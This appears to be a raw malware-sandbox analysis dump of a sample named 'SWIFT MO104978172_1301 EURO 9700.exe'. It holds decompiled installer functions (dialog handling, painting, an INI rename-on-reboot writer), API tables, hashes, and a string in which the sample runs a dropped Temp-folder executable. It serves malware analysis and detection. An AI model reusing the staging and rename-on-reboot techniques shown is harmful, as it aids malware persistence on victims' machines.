                                                                                  0x004054af
                                                                                  0x004054f0
                                                                                  0x004054f2
                                                                                  0x00405502
                                                                                  0x00405505
                                                                                  0x0040550a
                                                                                  0x00405511
                                                                                  0x00405514
                                                                                  0x004055b6
                                                                                  0x004055bf
                                                                                  0x004055c7
                                                                                  0x004055c7
                                                                                  0x004055d5
                                                                                  0x004055e6
                                                                                  0x004055e6
                                                                                  0x00000000
                                                                                  0x004055d5
                                                                                  0x0040551a
                                                                                  0x0040551d
                                                                                  0x00405523
                                                                                  0x00405528
                                                                                  0x0040552a
                                                                                  0x0040552c
                                                                                  0x00405532
                                                                                  0x00405539
                                                                                  0x0040553e
                                                                                  0x00405545
                                                                                  0x00405548
                                                                                  0x00405548
                                                                                  0x0040554f
                                                                                  0x0040555b
                                                                                  0x0040555f
                                                                                  0x00405561
                                                                                  0x00405561
                                                                                  0x00405551
                                                                                  0x00405553
                                                                                  0x00405553
                                                                                  0x00405581
                                                                                  0x0040558d
                                                                                  0x0040559c
                                                                                  0x0040559c
                                                                                  0x0040559e
                                                                                  0x004055a1
                                                                                  0x004055aa
                                                                                  0x00000000
                                                                                  0x004054b1
                                                                                  0x004054bc
                                                                                  0x004054bf
                                                                                  0x004054c4
                                                                                  0x004054c6
                                                                                  0x004054ca
                                                                                  0x004054da
                                                                                  0x004054e4
                                                                                  0x004054e6
                                                                                  0x004054e9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004054cc
                                                                                  0x004054cc
                                                                                  0x004054d2
                                                                                  0x004054d4
                                                                                  0x004054d4
                                                                                  0x004054d5
                                                                                  0x004054d6
                                                                                  0x00000000
                                                                                  0x004054cc
                                                                                  0x004054af
                                                                                  0x0040548a
                                                                                  0x004053cd
                                                                                  0x00000000
                                                                                  0x004053e3
                                                                                  0x004053ed
                                                                                  0x004053f2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405404
                                                                                  0x00405409
                                                                                  0x00405415
                                                                                  0x00405415
                                                                                  0x00405417
                                                                                  0x00405426
                                                                                  0x00405428
                                                                                  0x0040542c
                                                                                  0x0040542f
                                                                                  0x00000000
                                                                                  0x0040542f
                                                                                  0x004053cd
                                                                                  0x00405083
                                                                                  0x00405088
                                                                                  0x00405091
                                                                                  0x00405098
                                                                                  0x004050aa
                                                                                  0x004050b5
                                                                                  0x004050bb
                                                                                  0x004050c9
                                                                                  0x004050dd
                                                                                  0x004050e2
                                                                                  0x004050ef
                                                                                  0x004050f4
                                                                                  0x0040510a
                                                                                  0x0040511b
                                                                                  0x00405128
                                                                                  0x00405128
                                                                                  0x0040512b
                                                                                  0x00405131
                                                                                  0x00405133
                                                                                  0x00405136
                                                                                  0x0040513b
                                                                                  0x00405140
                                                                                  0x00405142
                                                                                  0x00405142
                                                                                  0x00405162
                                                                                  0x00405162
                                                                                  0x00405164
                                                                                  0x00405165
                                                                                  0x0040516a
                                                                                  0x00405170
                                                                                  0x00405174
                                                                                  0x00405179
                                                                                  0x00405181
                                                                                  0x00405185
                                                                                  0x0040518a
                                                                                  0x0040518f
                                                                                  0x00405197
                                                                                  0x0040519a
                                                                                  0x0040526a
                                                                                  0x0040527d
                                                                                  0x00000000
                                                                                  0x004051a0
                                                                                  0x004051a3
                                                                                  0x004051a6
                                                                                  0x004051a9
                                                                                  0x004051a9
                                                                                  0x004051af
                                                                                  0x004051b8
                                                                                  0x004051bb
                                                                                  0x004051bf
                                                                                  0x004051c2
                                                                                  0x004051c5
                                                                                  0x004051ce
                                                                                  0x004051d7
                                                                                  0x004051da
                                                                                  0x004051dd
                                                                                  0x004051e0
                                                                                  0x0040521e
                                                                                  0x00405249
                                                                                  0x00405220
                                                                                  0x0040522f
                                                                                  0x0040522f
                                                                                  0x004051e2
                                                                                  0x004051e5
                                                                                  0x004051f3
                                                                                  0x004051fd
                                                                                  0x00405205
                                                                                  0x0040520c
                                                                                  0x00405217
                                                                                  0x00405217
                                                                                  0x004051e0
                                                                                  0x0040524f
                                                                                  0x00405250
                                                                                  0x0040525c
                                                                                  0x0040525c
                                                                                  0x00405268
                                                                                  0x00405283
                                                                                  0x00405286
                                                                                  0x004052a3
                                                                                  0x00000000
                                                                                  0x00405288
                                                                                  0x0040528d
                                                                                  0x00405296
                                                                                  0x00405629
                                                                                  0x0040563b
                                                                                  0x0040563b
                                                                                  0x00405286
                                                                                  0x00000000
                                                                                  0x00405268
                                                                                  0x0040519a

                                                                                  APIs
                                                                                  • GetDlgItem.USER32 ref: 00405049
                                                                                  • GetDlgItem.USER32 ref: 00405054
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                  • LoadImageW.USER32 ref: 004050B5
                                                                                  • SetWindowLongW.USER32 ref: 004050CE
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                  • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                  • SetWindowLongW.USER32 ref: 0040527D
                                                                                  • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                  • GlobalFree.KERNEL32 ref: 0040546B
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                  • GetDlgItem.USER32 ref: 00405620
                                                                                  • ShowWindow.USER32(00000000), ref: 00405627
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $M$N
                                                                                  • API String ID: 2564846305-813528018
                                                                                  • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                  • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                  • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                  • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				int _v12;
                                                                                  				void* _v16;
                                                                                  				struct HWND__* _t56;
                                                                                  				signed int _t75;
                                                                                  				signed short* _t76;
                                                                                  				signed short* _t78;
                                                                                  				long _t92;
                                                                                  				int _t103;
                                                                                  				signed int _t110;
                                                                                  				intOrPtr _t113;
                                                                                  				WCHAR* _t114;
                                                                                  				signed int* _t116;
                                                                                  				WCHAR* _t117;
                                                                                  				struct HWND__* _t118;
                                                                                  
                                                                                  				if(_a8 != 0x110) {
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L13:
                                                                                  						if(_a8 != 0x4e) {
                                                                                  							if(_a8 == 0x40b) {
                                                                                  								 *0x421714 =  *0x421714 + 1;
                                                                                  							}
                                                                                  							L27:
                                                                                  							_t114 = _a16;
                                                                                  							L28:
                                                                                  							return E0040462B(_a8, _a12, _t114);
                                                                                  						}
                                                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                  						_t114 = _a16;
                                                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                  							_v12 = _t103;
                                                                                  							_v16 = _t113;
                                                                                  							_v8 = 0x428200;
                                                                                  							if(_t103 - _t113 < 0x800) {
                                                                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                  								_push(1);
                                                                                  								E00404A32(_a4, _v8);
                                                                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                  								_t114 = _a16;
                                                                                  							}
                                                                                  						}
                                                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                  							goto L28;
                                                                                  						} else {
                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                  								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                  							}
                                                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                  								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                  							}
                                                                                  							return 1;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                  						goto L27;
                                                                                  					} else {
                                                                                  						_t116 =  *0x422720 + 0x14;
                                                                                  						if(( *_t116 & 0x00000020) == 0) {
                                                                                  							goto L27;
                                                                                  						}
                                                                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                  						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                  						E00404A0E();
                                                                                  						goto L13;
                                                                                  					}
                                                                                  				}
                                                                                  				_t117 = _a16;
                                                                                  				_t75 =  *(_t117 + 0x30);
                                                                                  				if(_t75 < 0) {
                                                                                  					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                  				}
                                                                                  				_t76 =  *0x42a298 + _t75 * 2;
                                                                                  				_t110 =  *_t76 & 0x0000ffff;
                                                                                  				_a8 = _t110;
                                                                                  				_t78 =  &(_t76[1]);
                                                                                  				_a16 = _t78;
                                                                                  				_v16 = _t78;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = E00404734;
                                                                                  				if(_t110 != 2) {
                                                                                  					_v8 = E004046FA;
                                                                                  				}
                                                                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                  				_push(0x22);
                                                                                  				E004045C4(_a4);
                                                                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                  				_push(0x23);
                                                                                  				E004045C4(_a4);
                                                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                  				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                  				E004045F9(_t118);
                                                                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                  				_t92 =  *( *0x42a270 + 0x68);
                                                                                  				if(_t92 < 0) {
                                                                                  					_t92 = GetSysColor( ~_t92);
                                                                                  				}
                                                                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                  				 *0x421714 = 0;
                                                                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                  				 *0x421714 = 0;
                                                                                  				return 0;
                                                                                  			}


















                                                                                  0x00404795
                                                                                  0x004048c2
                                                                                  0x0040491f
                                                                                  0x00404923
                                                                                  0x004049f0
                                                                                  0x004049f2
                                                                                  0x004049f2
                                                                                  0x004049f8
                                                                                  0x004049f8
                                                                                  0x004049fb
                                                                                  0x00000000
                                                                                  0x00404a02
                                                                                  0x00404931
                                                                                  0x00404937
                                                                                  0x00404941
                                                                                  0x0040494c
                                                                                  0x0040494f
                                                                                  0x00404952
                                                                                  0x0040495d
                                                                                  0x00404960
                                                                                  0x00404967
                                                                                  0x00404974
                                                                                  0x00404985
                                                                                  0x0040498b
                                                                                  0x00404993
                                                                                  0x004049a1
                                                                                  0x004049a7
                                                                                  0x004049a7
                                                                                  0x00404967
                                                                                  0x004049b1
                                                                                  0x00000000
                                                                                  0x004049bc
                                                                                  0x004049c0
                                                                                  0x004049d0
                                                                                  0x004049d0
                                                                                  0x004049d6
                                                                                  0x004049e2
                                                                                  0x004049e2
                                                                                  0x00000000
                                                                                  0x004049e6
                                                                                  0x004049b1
                                                                                  0x004048cd
                                                                                  0x00000000
                                                                                  0x004048df
                                                                                  0x004048e4
                                                                                  0x004048ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404913
                                                                                  0x00404915
                                                                                  0x0040491a
                                                                                  0x00000000
                                                                                  0x0040491a
                                                                                  0x004048cd
                                                                                  0x0040479b
                                                                                  0x0040479e
                                                                                  0x004047a3
                                                                                  0x004047b4
                                                                                  0x004047b4
                                                                                  0x004047bc
                                                                                  0x004047bf
                                                                                  0x004047c3
                                                                                  0x004047c6
                                                                                  0x004047ca
                                                                                  0x004047cd
                                                                                  0x004047d0
                                                                                  0x004047d3
                                                                                  0x004047da
                                                                                  0x004047dc
                                                                                  0x004047dc
                                                                                  0x004047e6
                                                                                  0x004047f3
                                                                                  0x004047fd
                                                                                  0x00404802
                                                                                  0x00404805
                                                                                  0x0040480a
                                                                                  0x00404821
                                                                                  0x00404828
                                                                                  0x0040483b
                                                                                  0x0040483e
                                                                                  0x00404852
                                                                                  0x00404859
                                                                                  0x0040485e
                                                                                  0x00404863
                                                                                  0x00404863
                                                                                  0x00404871
                                                                                  0x0040487f
                                                                                  0x00404891
                                                                                  0x00404896
                                                                                  0x004048a6
                                                                                  0x004048a8
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CheckDlgButton.USER32 ref: 00404821
                                                                                  • GetDlgItem.USER32 ref: 00404835
                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                  • GetSysColor.USER32(?), ref: 00404863
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                  • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                  • GetDlgItem.USER32 ref: 004048FF
                                                                                  • SendMessageW.USER32(00000000), ref: 00404906
                                                                                  • GetDlgItem.USER32 ref: 00404931
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                  • SetCursor.USER32(00000000), ref: 00404985
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                  • SetCursor.USER32(00000000), ref: 004049A1
                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                  Strings
                                                                                  • "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 00404960
                                                                                  • N, xrefs: 0040491F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$N
                                                                                  • API String ID: 3103080414-1326665678
                                                                                  • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                  • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                  • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                  • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004062AE(void* __ecx) {
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				long _t12;
                                                                                  				long _t24;
                                                                                  				char* _t31;
                                                                                  				int _t37;
                                                                                  				void* _t38;
                                                                                  				intOrPtr* _t39;
                                                                                  				long _t42;
                                                                                  				WCHAR* _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t48;
                                                                                  				void* _t49;
                                                                                  				void* _t52;
                                                                                  				void* _t53;
                                                                                  
                                                                                  				_t38 = __ecx;
                                                                                  				_t44 =  *(_t52 + 0x14);
                                                                                  				 *0x426de8 = 0x55004e;
                                                                                  				 *0x426dec = 0x4c;
                                                                                  				if(_t44 == 0) {
                                                                                  					L3:
                                                                                  					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                  					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                  						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                  						_t53 = _t52 + 0x10;
                                                                                  						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                                  						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                                  						_t48 = _t12;
                                                                                  						 *(_t53 + 0x18) = _t48;
                                                                                  						if(_t48 != 0xffffffff) {
                                                                                  							_t42 = GetFileSize(_t48, 0);
                                                                                  							_t6 = _t37 + 0xa; // 0xa
                                                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                  							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                                  								L18:
                                                                                  								return CloseHandle(_t48);
                                                                                  							} else {
                                                                                  								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                  									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                                  									if(_t49 == 0) {
                                                                                  										_t48 =  *(_t53 + 0x18);
                                                                                  										L16:
                                                                                  										_t24 = _t42;
                                                                                  										L17:
                                                                                  										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                                                  										E0040620A(_t48, _t46, _t42 + _t37);
                                                                                  										GlobalFree(_t46);
                                                                                  										goto L18;
                                                                                  									}
                                                                                  									_t39 = _t46 + _t42;
                                                                                  									_t31 = _t39 + _t37;
                                                                                  									while(_t39 > _t49) {
                                                                                  										 *_t31 =  *_t39;
                                                                                  										_t31 = _t31 - 1;
                                                                                  										_t39 = _t39 - 1;
                                                                                  									}
                                                                                  									_t24 = _t49 - _t46 + 1;
                                                                                  									_t48 =  *(_t53 + 0x18);
                                                                                  									goto L17;
                                                                                  								}
                                                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                  								_t42 = _t42 + 0xa;
                                                                                  								goto L16;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					CloseHandle(E00406158(_t44, 0, 1));
                                                                                  					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t12;
                                                                                  			}



















                                                                                  0x004062ae
                                                                                  0x004062b7
                                                                                  0x004062be
                                                                                  0x004062c8
                                                                                  0x004062dc
                                                                                  0x00406304
                                                                                  0x0040630b
                                                                                  0x0040630f
                                                                                  0x00406313
                                                                                  0x00406333
                                                                                  0x0040633a
                                                                                  0x00406344
                                                                                  0x00406351
                                                                                  0x00406356
                                                                                  0x0040635b
                                                                                  0x0040635f
                                                                                  0x0040636e
                                                                                  0x00406370
                                                                                  0x0040637d
                                                                                  0x00406381
                                                                                  0x0040641c
                                                                                  0x00000000
                                                                                  0x00406397
                                                                                  0x004063a4
                                                                                  0x004063c8
                                                                                  0x004063cc
                                                                                  0x004063eb
                                                                                  0x004063ef
                                                                                  0x004063ef
                                                                                  0x004063f1
                                                                                  0x004063fa
                                                                                  0x00406405
                                                                                  0x00406410
                                                                                  0x00406416
                                                                                  0x00000000
                                                                                  0x00406416
                                                                                  0x004063ce
                                                                                  0x004063d1
                                                                                  0x004063dc
                                                                                  0x004063d8
                                                                                  0x004063da
                                                                                  0x004063db
                                                                                  0x004063db
                                                                                  0x004063e3
                                                                                  0x004063e5
                                                                                  0x00000000
                                                                                  0x004063e5
                                                                                  0x004063af
                                                                                  0x004063b5
                                                                                  0x00000000
                                                                                  0x004063b5
                                                                                  0x00406381
                                                                                  0x0040635f
                                                                                  0x004062de
                                                                                  0x004062e9
                                                                                  0x004062f2
                                                                                  0x004062f6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062f6
                                                                                  0x00406427

                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                  • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                  • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                  • wsprintfA.USER32 ref: 0040632D
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                  • GlobalFree.KERNEL32 ref: 00406416
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
                                                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                  • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                  • API String ID: 2171350718-2295842750
                                                                                  • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                  • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                  • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                  • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                  				struct tagLOGBRUSH _v16;
                                                                                  				struct tagRECT _v32;
                                                                                  				struct tagPAINTSTRUCT _v96;
                                                                                  				struct HDC__* _t70;
                                                                                  				struct HBRUSH__* _t87;
                                                                                  				struct HFONT__* _t94;
                                                                                  				long _t102;
                                                                                  				signed int _t126;
                                                                                  				struct HDC__* _t128;
                                                                                  				intOrPtr _t130;
                                                                                  
                                                                                  				if(_a8 == 0xf) {
                                                                                  					_t130 =  *0x42a270;
                                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                  					_a8 = _t70;
                                                                                  					GetClientRect(_a4,  &_v32);
                                                                                  					_t126 = _v32.bottom;
                                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                  					while(_v32.top < _t126) {
                                                                                  						_a12 = _t126 - _v32.top;
                                                                                  						asm("cdq");
                                                                                  						asm("cdq");
                                                                                  						asm("cdq");
